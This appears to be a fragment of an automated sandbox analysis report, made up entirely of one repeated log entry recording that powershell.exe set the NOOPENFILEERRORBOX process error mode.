                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
